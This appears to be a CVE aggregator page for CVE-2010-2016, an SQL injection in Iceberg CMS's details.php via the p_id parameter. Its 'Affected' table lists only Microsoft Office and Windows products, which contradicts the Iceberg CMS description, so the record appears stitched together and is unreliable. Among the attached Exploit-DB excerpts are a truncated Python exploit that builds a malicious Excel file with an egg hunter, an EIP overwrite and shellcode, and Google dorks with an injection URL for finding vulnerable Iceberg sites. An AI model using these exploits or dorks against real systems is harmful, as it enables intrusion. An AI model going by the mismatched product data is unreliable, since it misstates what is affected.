CVE-2010-2016
published 2010-05-24CVE-2010-2016: SQL injection vulnerability in details.php in Iceberg CMS allows remote attackers to execute arbitrary SQL commands via the p_id parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.9th percentile
SQL injection vulnerability in details.php in Iceberg CMS allows remote attackers to execute arbitrary SQL commands via the p_id parameter.
Affected
31 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | excel_services_on_microsoft_sharepoint_server_2007_service_pack_3 | — | — |
| msrc | excel_services_on_microsoft_sharepoint_server_2010_service_pack_2_bad | — | — |
| msrc | microsoft_excel_2007_service_pack_3 | — | — |
| msrc | microsoft_excel_2010_service_pack_2 | — | — |
| msrc | microsoft_excel_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_excel_2013_service_pack_1 | — | — |
| msrc | microsoft_excel_2016 | — | — |
| msrc | microsoft_excel_2016_for_mac | — | — |
| msrc | microsoft_excel_viewer_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016_for_mac | — | — |
| msrc | microsoft_office_compatibility_pack_service_pack_3 | — | — |
| msrc | microsoft_office_for_mac_2011 | — | — |
| msrc | microsoft_office_web_apps_2010_service_pack_2 | — | — |
| msrc | microsoft_office_word_viewer | — | — |
| msrc | microsoft_word_2007_service_pack_3 | — | — |
| msrc | microsoft_word_2010_service_pack_2 | — | — |
| msrc | microsoft_word_for_mac_2011 | — | — |
| msrc | windows_7_for_32-bit_systems_service_pack_1 | — | — |
| msrc | windows_7_for_x64-based_systems_service_pack_1 | — | — |
| msrc | windows_server_2008_for_32-bit_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_for_itanium-based_systems_service_pack_2 | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_msrc7.8HIGH
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fpfj-66xm-fh42: SQL injection vulnerability in details
ghsa_unreviewed·2022-05-17
CVE-2010-2016 [HIGH] CWE-89 GHSA-fpfj-66xm-fh42: SQL injection vulnerability in details
SQL injection vulnerability in details.php in Iceberg CMS allows remote attackers to execute arbitrary SQL commands via the p_id parameter.
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7268 [HIGH] Microsoft Office Information Disclosure Vulnerability
Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
Microsoft
Microsoft Excel Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7265 [HIGH] Microsoft Excel Information Disclosure Vulnerability
Microsoft Excel Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Excel software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Excel software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be off
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7291 [HIGH] Microsoft Office Information Disclosure Vulnerability
Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
Microsoft
Microsoft Office Information Disclosure Vulnerability
vendor_msrc·2016-12-13·CVSS 7.1
CVE-2016-7276 [HIGH] Microsoft Office Information Disclosure Vulnerability
Microsoft Office Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.
Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office software.
The security update addresses the vulnerability by properly initializing the affected variable.
FAQ: I have Microsoft Word 2010 installed. Why am I not being offered the 3128023 update?
The 3128023 update only applies to systems running specific configurations of Microsoft Office 2010. Some configurations will not be
Red Hat
kernel: v4l: videobuf: hotfix a bug on multiple calls to mmap()
vendor_redhat·2010-07-29·CVSS 7.8
CVE-2010-5321 [HIGH] kernel: v4l: videobuf: hotfix a bug on multiple calls to mmap()
kernel: v4l: videobuf: hotfix a bug on multiple calls to mmap()
Memory leak in drivers/media/video/videobuf-core.c in the videobuf subsystem in the Linux kernel 2.6.x through 4.x allows local users to cause a denial of service (memory consumption) by leveraging /dev/video access for a series of mmap calls that require new allocations, a different vulnerability than CVE-2007-6761. NOTE: as of 2016-06-18, this affects only 11 drivers that have not been updated to use videobuf2 instead of videobuf.
Statement: This issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5. This issue does affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2.
Based on the absence of upstream patch addressing this issue in
No detection rules found.
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it´s possible to exploit it through Excel too, however the target would ne
Exploit-DB
Excel RTD - Memory Corruption
exploitdb·2010-09-10·CVSS 9.3
CVE-2010-1247 [CRITICAL] Excel RTD - Memory Corruption
Excel RTD - Memory Corruption
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ 266:
print "[*] Error : Shellcode length is long"
return
if len(eggHunter) 0 :
eggHunter += '\x90'
dif = dif - 1
if len(shellcode) > 800:
print "[*] Error : Shellcode length is long"
return
if len(shellcode) 0 :
shellcode += '\x90'
dif = dif - 1
fdW= open('exploit.xls', 'wb+')
fdW.write(str1)
fdW.write("\x41\x41\x41") # padding
fdW.write(jmp)
fdW.write(eggHunter)
fdW.write("\xeb\x06\x41\x41")
fdW.write(eip)
fdW.write("\x81\xc4\x24\x16\x00\x00") # add esp,2016
fdW.write("\xc3") #ret
i = 0
while i < 54 :
fdW.write("\x41\x41\x41\x41") # padding
i = i + 1
fdW.write(str2)
fdW.write(shellcode)
fdW.write(str3)
fdW.close()
fdR.close()
print '[-
Exploit-DB
The iceberg - 'Content Management System' SQL Injection
exploitdb·2010-05-16
CVE-2010-2016 The iceberg - 'Content Management System' SQL Injection
The iceberg - 'Content Management System' SQL Injection
---
The iceberg 'Content Management System' SQL Injection Vulnerability
# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id=
# Dork : 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz, jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiLL SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a antisecurity [ pinjem script perl-na
http://packetstormsecurity.org/1005-exploits/iceberg-sql.txthttp://secunia.com/advisories/39833http://www.exploit-db.com/exploits/12620http://www.osvdb.org/64694http://www.vupen.com/english/advisories/2010/1161https://exchange.xforce.ibmcloud.com/vulnerabilities/58617http://packetstormsecurity.org/1005-exploits/iceberg-sql.txthttp://secunia.com/advisories/39833http://www.exploit-db.com/exploits/12620http://www.osvdb.org/64694http://www.vupen.com/english/advisories/2010/1161https://exchange.xforce.ibmcloud.com/vulnerabilities/58617
2010-05-24
Published